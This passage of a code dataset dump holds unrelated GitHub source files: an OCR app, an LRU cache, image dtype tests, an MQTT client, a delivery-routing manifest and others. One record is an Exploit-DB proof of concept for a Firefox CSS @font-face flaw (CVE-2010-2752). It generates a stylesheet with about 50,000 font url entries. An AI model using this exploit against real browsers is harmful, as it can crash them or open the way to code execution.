recognize_result.analyze_result.read_results:\n for line in text_result.lines:\n st.write(line.text)\n # print(line.text)\n img_draw = line.bounding_box\n draw.rectangle([(img_draw[0], img_draw[1]),\n (img_draw[4], img_draw[5])],\n fill=None, outline='yellow',\n width=5)\n text_w, text_y = draw.textsize(line.text, font=font)\n draw.rectangle([(img_draw[0], img_draw[1]),\n (img_draw[0]+text_w, img_draw[1]+text_y)],\n fill='yellow', width=5)\n draw.text((img_draw[0], img_draw[1]),\n line.text, fill='black', font=font)\n\n\nst.title('Text Recognition App')\n\nuploaded_file = st.file_uploader('Choose an image...', type=['jpg', 'png'])\n\nif uploaded_file is not None:\n img = Image.open(uploaded_file)\n img_path = f'img/{uploaded_file.name}'\n img.save(img_path)\n\n # img = Image.open(local_image_path)\n draw = ImageDraw.Draw(img)\n font = ImageFont.truetype(font='meiryo.ttc', size=70)\n\n call_api_with_image(img_path)\n\n st.image(img)\n","repo_name":"donakuma/OCR","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2469786818","text":"\"\"\"\nDesign and implement a data structure that satisfies the constraints of an LRU (Least Recently Used) cache.\nImplement the LRUCache class:\nLRUCache(int capacity) initializes the LRU cache with a positive integer capacity.\nint get(int key) returns the value of key if it exists in the cache, otherwise returns -1.\nvoid put(int key, int value) updates the value of key if it already exists;\nif it does not, inserts the key-value pair into the cache. If the insertion makes the number of keys exceed capacity, evict the least recently used key.\nThe functions get and put must each run in O(1) average time complexity.\n\nSource: LeetCode\nLink: https://leetcode.cn/problems/lru-cache\n\neg1:\nInput\n[\"LRUCache\", \"put\", \"put\", \"get\", \"put\", \"get\", \"put\", \"get\", \"get\", \"get\"]\n[[2], [1, 1], [2, 2], [1], [3, 3], [2], [4, 4], [1], [3], [4]]\nOutput\n[null, null, null, 1, null, -1, null, -1, 3, 4]\n\nExplanation\nLRUCache lRUCache = new LRUCache(2);\nlRUCache.put(1, 1); // cache is {1=1}\nlRUCache.put(2, 2); // cache is {1=1, 2=2}\nlRUCache.get(1); // returns 1\nlRUCache.put(3, 3); // this operation evicts key 2, cache is {1=1, 3=3}\nlRUCache.get(2); // returns -1 (not found)\nlRUCache.put(4, 4); // this operation evicts key 1, cache is {4=4, 3=3}\nlRUCache.get(1); // returns -1 (not found)\nlRUCache.get(3); // returns 3\nlRUCache.get(4); // returns 4\n\n\"\"\"\n\n\nclass Node:\n def __init__(self, key, val):\n self.key = key\n self.val = val\n self.prev = None\n self.next = None\n\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.cache = dict()\n self.cache_num = 0\n self.head = Node(-1, -1)\n self.tail = Node(-1, -1)\n self.head.next = self.tail\n self.tail.prev = self.head\n\n def get(self, key: int) -> int:\n if key in self.cache.keys():\n self.remove(self.cache[key])\n self.putHead(self.cache[key])\n return self.cache[key].val\n else:\n return -1\n\n def put(self, key: int, value: int) -> None:\n if key in self.cache.keys():\n self.cache[key].key = key\n self.cache[key].val = value\n self.remove(self.cache[key])\n self.putHead(self.cache[key])\n else:\n self.cache[key] = Node(key, value)\n self.putHead(self.cache[key])\n self.cache_num += 1\n if self.capacity < self.cache_num:\n removed = self.removeTail()\n self.cache.pop(removed.key)\n self.cache_num -= 1\n\n def remove(self, rm_node):\n rm_node.prev.next = rm_node.next\n rm_node.next.prev = rm_node.prev\n\n def putHead(self, node):\n node.next = self.head.next\n self.head.next.prev = node\n node.prev = self.head\n self.head.next = node\n\n def removeTail(self):\n removed = self.tail.prev\n self.tail.prev = self.tail.prev.prev\n self.tail.prev.next = self.tail\n return removed\n\n\nif __name__ == '__main__':\n lru = 
LRUCache(2)\n lru.put(1, 1)\n lru.put(2, 2)\n # print('size: ', lru.cache_num)\n print(lru.get(1))\n # print('size: ', lru.cache_num)\n lru.put(3, 3)\n # print('size: ', lru.cache_num)\n print(lru.get(2))\n # print('size: ', lru.cache_num)\n lru.put(4, 4)\n # print('size: ', lru.cache_num)\n print(lru.get(1))\n print(lru.get(3))\n print(lru.get(4))\n # print('size: ', lru.cache_num)\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"TQQ615/leetcode","sub_path":"数组及其他/LRU缓存.py","file_name":"LRU缓存.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38089357255","text":"import sys\nimport pyfiglet\n\nif len(sys.argv) == 1:\n\ttext = input('Input: ')\n\tpyfiglet.print_figlet(text)\nelif len(sys.argv) == 3:\n\tif sys.argv[1] == '-f' or sys.argv[1] == '--font':\n\t\ttry:\n\t\t\tpyfiglet.print_figlet('', font=sys.argv[2])\n\t\t\ttext = input('Input: ')\n\t\t\tpyfiglet.print_figlet(text, font=sys.argv[2])\n\t\texcept pyfiglet.FontNotFound:\n\t\t\tprint(f'{sys.argv[2]} is not a font')\n\t\t\tsys.exit(1)\n\telse:\n\t\tprint('Wrong args')\n\t\tsys.exit(1)\nelse:\n\tprint('Too few args')\n\tsys.exit(1)\n","repo_name":"KikiMcArron/CS50_Python","sub_path":"set_4/figlet/figlet.py","file_name":"figlet.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28549578824","text":"import numpy as np\nfrom numpy.testing import assert_equal, assert_raises\nfrom skimage import img_as_int, img_as_float, \\\n img_as_uint, img_as_ubyte\nfrom skimage.util.dtype import convert\nfrom skimage._shared._warnings import expected_warnings\n\n\ndtype_range = {np.uint8: (0, 255),\n np.uint16: (0, 65535),\n np.int8: (-128, 127),\n np.int16: (-32768, 32767),\n np.float32: (-1.0, 1.0),\n np.float64: (-1.0, 1.0)}\n\n\ndef _verify_range(msg, x, vmin, vmax, dtype):\n assert_equal(x[0], vmin)\n assert_equal(x[-1], vmax)\n assert x.dtype == dtype\n\n\ndef test_range():\n for dtype in dtype_range:\n imin, imax = dtype_range[dtype]\n x = np.linspace(imin, imax, 10).astype(dtype)\n\n for (f, dt) in [(img_as_int, np.int16),\n (img_as_float, np.float64),\n (img_as_uint, np.uint16),\n (img_as_ubyte, np.ubyte)]:\n\n with expected_warnings(['precision loss|sign loss|\\A\\Z']):\n y = f(x)\n\n omin, omax = dtype_range[dt]\n\n if imin == 0 or omin == 0:\n omin = 0\n imin = 0\n\n yield (_verify_range,\n \"From %s to %s\" % (np.dtype(dtype), np.dtype(dt)),\n y, omin, omax, np.dtype(dt))\n\n\ndef test_range_extra_dtypes():\n \"\"\"Test code paths that are not skipped by `test_range`\"\"\"\n\n # Add non-standard data types that are allowed by the `convert` function.\n dtype_range_extra = dtype_range.copy()\n dtype_range_extra.update({np.int32: (-2147483648, 2147483647),\n np.uint32: (0, 4294967295)})\n\n dtype_pairs = [(np.uint8, np.uint32),\n (np.int8, np.uint32),\n (np.int8, np.int32),\n (np.int32, np.int8),\n (np.float64, np.float32),\n (np.int32, np.float32)]\n\n for dtype_in, dt in dtype_pairs:\n imin, imax = dtype_range_extra[dtype_in]\n x = np.linspace(imin, imax, 10).astype(dtype_in)\n\n with expected_warnings(['precision loss|sign loss|\\A\\Z']):\n y = convert(x, dt)\n\n omin, omax = dtype_range_extra[dt]\n yield (_verify_range,\n \"From %s to %s\" % (np.dtype(dtype_in), np.dtype(dt)),\n y, omin, omax, np.dtype(dt))\n\n\ndef 
test_downcast():\n x = np.arange(10).astype(np.uint64)\n with expected_warnings('Downcasting'):\n y = img_as_int(x)\n assert np.allclose(y, x.astype(np.int16))\n assert y.dtype == np.int16, y.dtype\n\n\ndef test_float_out_of_range():\n too_high = np.array([2], dtype=np.float32)\n assert_raises(ValueError, img_as_int, too_high)\n too_low = np.array([-2], dtype=np.float32)\n assert_raises(ValueError, img_as_int, too_low)\n\n\ndef test_copy():\n x = np.array([1], dtype=np.float64)\n y = img_as_float(x)\n z = img_as_float(x, force_copy=True)\n\n assert y is x\n assert z is not x\n\n\ndef test_bool():\n img_ = np.zeros((10, 10), np.bool_)\n img8 = np.zeros((10, 10), np.bool8)\n img_[1, 1] = True\n img8[1, 1] = True\n for (func, dt) in [(img_as_int, np.int16),\n (img_as_float, np.float64),\n (img_as_uint, np.uint16),\n (img_as_ubyte, np.ubyte)]:\n converted_ = func(img_)\n assert np.sum(converted_) == dtype_range[dt][1]\n converted8 = func(img8)\n assert np.sum(converted8) == dtype_range[dt][1]\n\nif __name__ == '__main__':\n np.testing.run_module_suite()\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/skimage/util/tests/test_dtype.py","file_name":"test_dtype.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"11072008602","text":"def MinimumSkew(Genome):\n positions = [] # output variable\n skew = Skew(Genome)\n minimum = min(skew.values())\n for i in range(len(Genome)):\n if skew[i] == minimum:\n positions.append(i)\n return positions\n\n# Input: A String Genome\n# Output: SkewArray(Genome)\n# HINT: This code should be taken from the last Code Challenge.\ndef Skew(Genome):\n skew = {} #initializing the dictionary\n skew[0] = 0\n for i in range(len(Genome)):\n if Genome[i] == \"C\":\n skew[i + 1] = skew[i] -1\n elif Genome[i] == \"G\":\n skew[i +1] = skew[i] +1\n else:\n skew[i+1] = skew[i]\n # your code here\n return skew\n","repo_name":"mars1198/bioinformatics","sub_path":"MinimumSkew.py","file_name":"MinimumSkew.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31470130652","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n \n# Author: QuYingqi\n# mail: cookiequ17@hotmail.com\n# Created Time: 2017-11-08\nimport torch\nimport sys\nsys.path.append('../vocab')\nfrom seqMultiLabelLoader import SeqMultiLabelLoader\nimport numpy as np\n\n\nword_vocab = torch.load('../vocab/vocab.word.pt')\ntype_vocab = torch.load('../vocab/vocab.type.pt')\nseqs, labels = torch.load('data/train.subject_type.pt')\n'''\nprint(seqs[0])\nindex_question = np.transpose(seqs[0].numpy())\nprint(index_question)\n\nfor i in range(10):\n question_array = np.array(word_vocab.convert_to_word(index_question[i]))\n print(' '.join(question_array))\n'''\nloader = SeqMultiLabelLoader('data/test.subject_type.pt', 0)\nfor i,batch in enumerate(loader.next_batch(False)):\n if i > 1:break\n seq, label = batch\n question = np.transpose(seq.data.cpu().numpy())\n label = label.data.cpu().numpy()\n for i in range(10):\n array = np.array(word_vocab.convert_to_word(question[i]))\n print(' '.join(array))\n 
print(type_vocab.convert_to_word(np.where(label[i])[0]))\n","repo_name":"feiyutalk/kbqa_FB","sub_path":"subject_type/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73951564266","text":"import k2\nimport torch\nfrom conformer import Conformer\nfrom decoder import Decoder\nfrom joiner import Joiner\nfrom model import Transducer\n\n\ndef test_transducer():\n # encoder params\n input_dim = 10\n output_dim = 20\n\n # decoder params\n vocab_size = 3\n blank_id = 0\n embedding_dim = 128\n num_layers = 2\n\n encoder = Conformer(\n num_features=input_dim,\n output_dim=output_dim,\n subsampling_factor=4,\n d_model=512,\n nhead=8,\n dim_feedforward=2048,\n num_encoder_layers=12,\n )\n\n decoder = Decoder(\n vocab_size=vocab_size,\n embedding_dim=embedding_dim,\n blank_id=blank_id,\n num_layers=num_layers,\n hidden_dim=output_dim,\n output_dim=output_dim,\n embedding_dropout=0.0,\n rnn_dropout=0.0,\n )\n\n joiner = Joiner(output_dim, vocab_size)\n transducer = Transducer(encoder=encoder, decoder=decoder, joiner=joiner)\n\n y = k2.RaggedTensor([[1, 2, 1], [1, 1, 1, 2, 1]])\n N = y.dim0\n T = 50\n\n x = torch.rand(N, T, input_dim)\n x_lens = torch.randint(low=30, high=T, size=(N,), dtype=torch.int32)\n x_lens[0] = T\n\n loss = transducer(x, x_lens, y)\n print(loss)\n\n\ndef main():\n test_transducer()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"k2-fsa/icefall","sub_path":"egs/librispeech/ASR/transducer/test_transducer.py","file_name":"test_transducer.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"37"} +{"seq_id":"3855303596","text":"import paho.mqtt.client as mqtt\nimport json\nimport time\n\nclass MQTTConnection:\n\n\tdef __init__(self, broker_address, port, topic_alert, topic_auto, topic_rsu, rsu_id):\n\t\tself.broker = broker_address\n\t\tself.port = port\n\t\tself.topic_alert = topic_alert\n\t\tself.topic_auto = topic_auto\n\t\tself.topic_rsu = topic_rsu\n\t\tself.rsu_id = rsu_id\n\t\tself.client = mqtt.Client(rsu_id)\n\t\tself.client.on_connect = self.on_connect\n\t\tself.client.on_message = self.on_message\n\t\tself.on_alert_callback = None # optional callback consumed by manage_alert; set before the network loop starts\n\t\tself.client.connect(broker_address, port)\n\t\tself.client.loop_start()\n\n\tdef on_connect(self, client, userdata, flags, rc):\n\t\tprint(\" Connected to the MQTT broker: \")\n\t\tclient.subscribe(self.topic_alert + \"/\" + self.rsu_id + '/#')\n\n\tdef on_message(self, client, userdata, message):\n\t\tif message.topic.startswith(\"/alert\"):\n\t\t\tpayload = json.loads(message.payload)\n\t\t\tif payload[\"creator_id\"] == self.rsu_id:\n\t\t\t\tpass \n\t\t\telse:\n\t\t\t\tcreator = payload[\"creator_id\"]\n\t\t\t\tt_arrival = time.time()*1000 \n\t\t\t\tt_trasm = payload[\"t_creation\"]*1000\n\t\t\t\tt_total_ms = round(t_arrival - t_trasm)\n\t\t\t\tprint(\" from\", creator, \" - time taken:\", t_total_ms , \" ms\")\n\t\t\t\tpayload[\"t_travel\"]= t_total_ms\n\t\t\t\tself.manage_alert(payload)\n\t\t\t\n\t\t\t#print(\" Alert received\")\n\t\t\t#payload = json.loads(message.payload)\n\t\t\t#print(payload)\n\t\t\t#self.manage_alert(payload)\n\t\t\t# alert_id = payload[\"id\"]\n\t\t\t# alert[alert_id] = payload\n\n\tdef handle_message(self, topic, message):\n\t\tif message.topic.startswith(\"/smartcar\"):\n\t\t\tpayload = json.loads(message.payload)\n\t\t\tvehicle_id = payload[\"id\"] \n\t\t\tif payload[\"rsu_id\"] == 
self.rsu_id:\n\t\t\t\tveicoli_connessi[vehicle_id] = payload\n\n\tdef send_vehicle_status(self,vehicle_info):\n\t\tvehicle_info_json = json.dumps(vehicle_info)\n\t\tself.client.publish(self.topic_auto + \"/info\", vehicle_info_json)\n\n\tdef send_alert(self, alert):\n\t\talert_json = json.dumps(alert)\n\t\ttype = alert.get(\"type\", \"undefined\")\n\t\tself.client.publish(self.topic_alert + \"/\" + self.rsu_id + \"/\" + type, alert_json)\n\n\tdef manage_alert(self, payload):\n\t\tif self.on_alert_callback:\n\t\t\tself.on_alert_callback(payload)","repo_name":"mariocarbone/tesi","sub_path":"rsu/mqtt_lib.py","file_name":"mqtt_lib.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40136610856","text":"class Car:\r\n name = \"\"\r\n brands = \"\"\r\n price = None\r\n company = \"\"\r\n\r\n def __init__(self, name, brands, price, owner_com):\r\n self.name = name\r\n self.brands = brands\r\n self.price = price\r\n self.company = owner_com\r\n\r\n def buy(self):\r\n print(f\"\\nYou have bought {self.brands} from the company {self.company}\")\r\n print(f\"\\t\\tYou have successfully paid {self.price}$ for {self.name}\")\r\n print(f\"\\t\\tThank You. \")\r\n\r\n\r\ncar1 = Car('BMW-12','BMW',20500,\"Volkswagen\")\r\ncar1.buy()\r\n\r\ncar1 = Car('Audi-1A','Audi',16800,\"Audi\")\r\ncar1.buy()\r\n\r\n","repo_name":"NurulIslam17/PYTHON","sub_path":"OOP/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9639596475","text":"import cbf\nimport recsys\nimport util\nimport presentation\nimport json\n\nsfw_games = \"../resources/sfw_games.json\"\nmost_popular_games_steam = \"../resources/most_popular_games_steam.json\"\ntags = \"../resources/relevant_tags.json\"\n\nICM_append, URM, liked_tags, disliked_tags = recsys.get_k_most_popular_tags(tags, 12, 28)\nICM, ICM_link = recsys.setup_ICM(sfw_games, ICM_append)\n\n\nuserID_to_index, itemID_to_index, featureID_to_index = recsys.create_mappings(ICM, URM)\nrecsys.apply_mappings(ICM, URM, userID_to_index, itemID_to_index, featureID_to_index)\n\nICM_all, URM_all = recsys.convert_to_sparse(ICM, URM, userID_to_index, itemID_to_index, featureID_to_index)\n\nrecommender = cbf.Recommender(URM_all, ICM_all, ICM_link, itemID_to_index)\nrecommender.fit(shrink=10, topK=50)\n\ngames = recommender.recommend(0)\nrecommendations = []\npresentation = presentation.Presentation(ICM, liked_tags, disliked_tags, itemID_to_index, featureID_to_index)\n\npresentation.present_result(games, ICM_link)\n#\"\"\"","repo_name":"Zatfer17/II2202_Research_Methodology_And_Scientific_Writing","sub_path":"code/interview.py","file_name":"interview.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74440747251","text":"from datetime import timedelta\nimport hashtable\n\n\n# The Manifest holds onto all the information of the packages that\n# will be loaded on the trucks once they are sorted and routed\nclass Manifest:\n    def __init__(self, manifest_id):\n        self.manifest_id = manifest_id\n        self.packages = list()\n        self.truck = 0\n        self.driver = 0\n        self.is_full = False\n        self.route = list()\n        self.packages_by_location = hashtable.HashTable()\n\n    # Used to print package information when using various messages\n    def __str__(self):\n        return 
'\n'.join(str(package) for package in self.packages)\n\n # Used for debugging purposes\n def __repr__(self):\n return '\n'.join(str(package) for package in self.route)\n\n # O(n)\n # When adding multiple packages to the manifest\n def add_packages(self, packages):\n for package in packages:\n self.add_package(package)\n\n # O(n)\n # Adding a package to the manifest\n def add_package(self, package):\n if package not in self.packages:\n if package.delivery_status == 'At Hub':\n if package.delay != timedelta(hours=8) or package.wrong_address == 'W':\n package.delivery_status = 'Delayed'\n else:\n # maybe change name\n package.delivery_status = 'Loading'\n self.packages.append(package)\n elif package.delivery_status == 'Loading':\n print('{}, already loading...'.format(repr(package)))\n if self.packages_by_location.get(package.location) is None:\n self.packages_by_location.put(package.location, list())\n self.packages_by_location.get(package.location).append(package)\n if len(self.packages) == 16:\n self.is_full = True\n else:\n print('Error adding: ' + str(package) + ', already on Manifest')\n\n # Remove a package from the manifest\n def remove_package(self, package):\n if package in self.packages:\n package.delivery_status = 'At Hub'\n self.packages.remove(package)\n self.packages_by_location.remove(package.location, package)\n if len(self.packages) == 16:\n self.is_full = False\n else:\n print('Error removing: ' + str(package) + ', not on Manifest')\n\n\n# The Driver holds onto the time to handle when they would leave and depart from the warehouse or 'Hub'\nclass Driver:\n def __init__(self, driver_id):\n self.driver_id = driver_id\n self.time = timedelta(hours=8)\n\n\n# The Manifest List handles all the sorting and routing of each manifest\nclass ManifestList:\n\n def __init__(self, num_manifests, warehouse, hub):\n self.num_manifests = num_manifests\n self.manifests = list()\n self.hub = hub\n self.warehouse = warehouse\n\n # O(n)\n # Adds all packages to manifests from each territory\n # Looks at each manifest to see if it is over capacity\n # Removes those packages\n # After manifests are at capacity or 'full', loads remaining packages onto new manifests\n # While adding packages to a manifest, both the truck and deliver-with constraints are handled\n def sort(self, territories):\n print('Sorting packages...')\n num_territories = len(territories)\n # print('Amount of Manifests: ' + str(self.num_manifests))\n for m in range(self.num_manifests):\n manifest = Manifest(m)\n if m < num_territories:\n self.add_packages_to_manifest_from_territory(territories[m], manifest)\n else:\n self.move_non_constraint_packages_to_other_manifest(manifest)\n self.manifests.append(manifest)\n # print(' Manifest {0}:'.format(manifest.manifest_id))\n # print(str(manifest))\n self.assign_truck_ids()\n\n # O(n)\n # Assigns truck ids to manifests without them\n def assign_truck_ids(self):\n truck_id_list = ['1', '2', '3']\n for manifest in self.manifests:\n if manifest.truck == 0:\n manifest.truck = truck_id_list[0]\n truck_id_list.pop(0)\n else:\n truck_id_list.remove(manifest.truck)\n\n # O(n^2)\n # Add package to manifest from territory\n def add_packages_to_manifest_from_territory(self, territory, manifest):\n for location in territory:\n packages = self.warehouse.packages_by_location.get(location)\n for package in packages:\n # Handle Truck constraint\n if package.delivery_status == 'At Hub':\n if manifest.truck == 0 and package.truck != '':\n manifest.truck = package.truck\n 
manifest.add_packages(self.warehouse.packages_by_truck.get(package.truck))\n # Handle Deliver With constraint\n elif len(package.deliver_with) > 0:\n manifest.add_packages(self.warehouse.get_packages_deliver_together(package.deliver_with))\n # Handle package without constraint\n else:\n manifest.add_package(package)\n\n # O(n^2)\n # Remove packages from manifest over the set truck capacity and add to a new manifest\n def move_non_constraint_packages_to_other_manifest(self, manifest):\n for t_manifest in self.manifests:\n if t_manifest.is_full:\n packages = self.get_non_constraint_packages(t_manifest)\n for package in packages:\n manifest.add_package(package)\n\n # O(n^2)\n # Removes packages from an over capacity manifest and adds them to a list\n def get_non_constraint_packages(self, manifest):\n removed_packages = list()\n furthest_locations_from_hub = reversed(self.hub.get_neighbors())\n for package in manifest.packages:\n if manifest.is_full:\n if package.wrong_address is not '':\n removed_packages.append(package)\n manifest.remove_package(package)\n else:\n break\n for neighbor in furthest_locations_from_hub:\n if manifest.is_full:\n packages_at_location = manifest.packages_by_location.get(neighbor.location)\n if packages_at_location is not None:\n for package in packages_at_location:\n if not package.has_constraint():\n removed_packages.append(package)\n manifest.remove_package(package)\n return removed_packages\n\n # O(n^2)\n # Routes the manifests packages and places them on a new list\n # Looks at three different situations\n # 1) If a package is delayed, 2) has a deadline, or\n # 3) is the closest to the current location\n # It then then look at each candidate to decide where to go to first\n # Once an optimal candidate id chosen it is added to the route\n def route(self):\n print('Routing packages...')\n drivers = [Driver(1), Driver(2)]\n for manifest in self.manifests:\n driver = drivers[0]\n if drivers[0].time > drivers[1].time:\n driver = drivers[1]\n time = driver.time\n # print('Driver is driver {}'.format(driver.driver_id))\n manifest.driver = driver.driver_id\n current_location = self.hub\n # print(' Manifest {0}:'.format(manifest.manifest_id))\n while len(manifest.route) < len(manifest.packages):\n # 'wrong address' scenario\n if time >= timedelta(hours=10, minutes=40):\n package = self.warehouse.packages_by_id.get(9)\n package.delivery_status = 'Loaded'\n package.location = self.warehouse.g.get_location('410 S State St')\n\n delayed = self.find_soonest_delayed_time(current_location, manifest)\n closest = self.find_closest_from_package(current_location, manifest)\n soonest = self.find_soonest_delivery_time(current_location, manifest)\n\n package_delivery = self.schedule_best_package(delayed, soonest, closest, time, current_location,\n manifest)\n\n current_location = package_delivery.package.location\n time = package_delivery.package.estimated_delivery_time\n to_hub = package_delivery.package.location.neighbors_by_location.get(self.hub)\n time = time + timedelta(hours=to_hub.distance/18)\n driver.time = time\n # Switch drivers\n drivers.append(driver)\n if drivers[0]:\n drivers.pop(0)\n elif drivers[1]:\n driver.pop(1)\n\n # O(n^2)\n # Looks for the package with the soonest deadline and returns it as a candidate\n def find_soonest_delivery_time(self, starting_point, manifest):\n neighbors = starting_point.get_neighbors()\n soonest_hours_to = timedelta(hours=23.99)\n soonest_package = None\n soonest = timedelta(hours=17)\n soonest_miles = 0\n for neighbor in neighbors:\n 
packages = manifest.packages_by_location.get(neighbor.location)\n if packages is not None:\n for package in packages:\n if package not in manifest.route:\n if package.deadline < soonest:\n soonest_package = package\n soonest_hours_to = neighbor.get_hours_to()\n soonest = package.deadline\n soonest_miles = neighbor.distance\n return PackageDelivery(soonest_package, soonest_hours_to, soonest_miles)\n\n # O(n^2)\n # Looks for the package that is the closest to the current location and returns it as a candidate\n def find_closest_from_package(self, current_location, manifest):\n current_location_packages = manifest.packages_by_location.get(current_location)\n if current_location_packages is not None:\n for package in current_location_packages:\n if package not in manifest.route and package.delivery_status is not 'Delayed' and package in manifest.packages:\n return PackageDelivery(package, timedelta(hours=0), 0)\n closest_locations_to_package = current_location.get_neighbors()\n for neighbor in closest_locations_to_package:\n for pac in manifest.packages:\n if pac not in manifest.route and pac.location is neighbor.location:\n if pac.delivery_status is not 'Delayed':\n return PackageDelivery(pac, neighbor.get_hours_to(), neighbor.distance)\n else:\n continue\n\n # O(n^2)\n # Looks for a package that is delayed and returns it as a candidate\n def find_soonest_delayed_time(self, starting_point, manifest):\n neighbors = starting_point.get_neighbors()\n delayed_hours_to = timedelta(hours=23.99)\n delayed_package = None\n delayed = timedelta(hours=17)\n delayed_miles = 0\n for neighbor in neighbors:\n packages = manifest.packages_by_location.get(neighbor.location)\n if packages is not None:\n for package in packages:\n if package not in manifest.route:\n if package.delay < delayed and package.delay != timedelta(\n hours=8) and package.delivery_status is 'Delayed':\n delayed_package = package\n delayed_hours_to = neighbor.get_hours_to()\n delayed = package.delay\n delayed_miles = neighbor.distance\n return PackageDelivery(delayed_package, delayed_hours_to, delayed_miles)\n\n # O(1) + O(n) + 0(1)\n # Choose which candidate will be delivered by first checking oif the deadline will be met\n # second, if the package has a delay, and third if the the other 2 criteria are not met it will\n # choose the closest package\n def schedule_best_package(self, delayed, soonest, closest, time, current_location, manifest):\n if soonest.package is not None and closest is not None and soonest.package is not closest.package:\n more_time = self.find_time_between(closest.package.location, soonest.package.location)\n total_time = time + closest.hours_to + more_time\n if total_time > soonest.package.deadline:\n return self.schedule_package_delivery(soonest, time, timedelta(0), manifest, 'Soonest')\n if delayed.package is not None and closest is not None:\n time_back = self.find_time_between(self.hub, delayed.package.location)\n if time + closest.hours_to > delayed.package.delay:\n time_to_hub = self.find_time_between(current_location, self.hub)\n for package in manifest.packages:\n if package.delivery_status is 'Delayed' and package.delay == delayed.package.delay:\n package.delivery_status = 'Loaded'\n return self.schedule_package_delivery(delayed, time, time_to_hub + time_back, manifest, 'Delayed')\n if closest is not None and closest.package is not None:\n return self.schedule_package_delivery(closest, time, timedelta(0), manifest, 'Closest')\n\n # O(1)\n # Schedules the package, giving it a delivery time\n def 
schedule_package_delivery(self, package_delivery, time, additional_time, manifest, type):\n package_delivery.type = type\n manifest.route.append(package_delivery.package)\n package_delivery.package.estimated_delivery_time = time + additional_time + package_delivery.hours_to\n package_delivery.package.hours_to = package_delivery.hours_to + additional_time\n package_delivery.package.miles_to = float(package_delivery.package.hours_to.seconds / 60) / 60 * 18\n # print(' Added {}'.format(repr(package_delivery)))\n return package_delivery\n\n # O(n)\n # Finds the time it take to travel between locations\n def find_time_between(self, other_location, soonest_location):\n if other_location is soonest_location:\n return timedelta(hours=0)\n neighbors = other_location.get_neighbors()\n for neighbor in neighbors:\n if neighbor.location is soonest_location:\n return neighbor.get_hours_to()\n\n\n# The Package Delivery acts as a candidate for a package to be delivered.\nclass PackageDelivery:\n def __init__(self, package, hours_to, miles_to):\n self.package = package\n self.hours_to = hours_to\n self.miles_to = miles_to\n self.type = ''\n\n def __repr__(self):\n return ' Type {}, {}, Hours to {}'.format(self.type, repr(self.package), self.hours_to)\n","repo_name":"branlewalk/wgu-c950","sub_path":"manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":14976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32570926498","text":"'''\n __ __ ____ _ _ ____\n | \\/ |/ __ \\ /\\ | | | | _ \\\n | \\ / | | | | / \\ | | | | |_) |\n | |\\/| | | | |/ /\\ \\| | | | _ <\n | | | | |__| / ____ \\ |__| | |_) |\n |_| |_|\\____/_/ \\_\\____/|____/\n\n http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/\n https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15104.zip (moaub-25-exploit.zip)\n\n'''\n\n'''\n Title : Mozilla Firefox CSS font-face Remote Code Execution Vulnerability\n Version : Firefox\n Analysis : http://www.abysssec.com\n Vendor : http://www.mozilla.com\n Impact : Crirical\n Contact : shahin [at] abysssec.com , info [at] abysssec.com\n Twitter : @abysssec\n CVE : CVE-2010-2752\n\n'''\n\nimport sys;\n\nmyStyle = \"\"\"\n @font-face {\n font-family: Sean;\n font-style: normal;\n font-weight: normal;\n src: url(SEAN1.eot);\n src: url('type/filename.woff') format('woff')\n\n\"\"\"\ni=0\nwhile(i<50000):\n myStyle = myStyle + \",url('type/filename.otf') format('opentype')\\n\";\n i=i+1\n\nmyStyle = myStyle + \",url('type/filename.otf') format('opentype');\\n\";\nmyStyle = myStyle + \"}\\n\";\ncssFile = open(\"style2.css\",\"w\")\ncssFile.write(myStyle)\ncssFile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/15104.py","file_name":"15104.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"42502091850","text":"###########################\n# Cache Coherence Simulator\n# Author: Adam McCarthy\n###########################\nimport pickle\nimport sys\n\nfrom argparse import ArgumentParser, RawTextHelpFormatter\n\nfrom tqdm import tqdm\n\nfrom cache import Bus\nfrom cache.protocols.msi import MSICache\nfrom cache.protocols.mesi import MESICache\nfrom cache.protocols.mes import MESCache\nfrom utils import int_or_None, parse_line\n\n\ndef record_stats(stats, caches):\n \"\"\"\n Records the stats for 
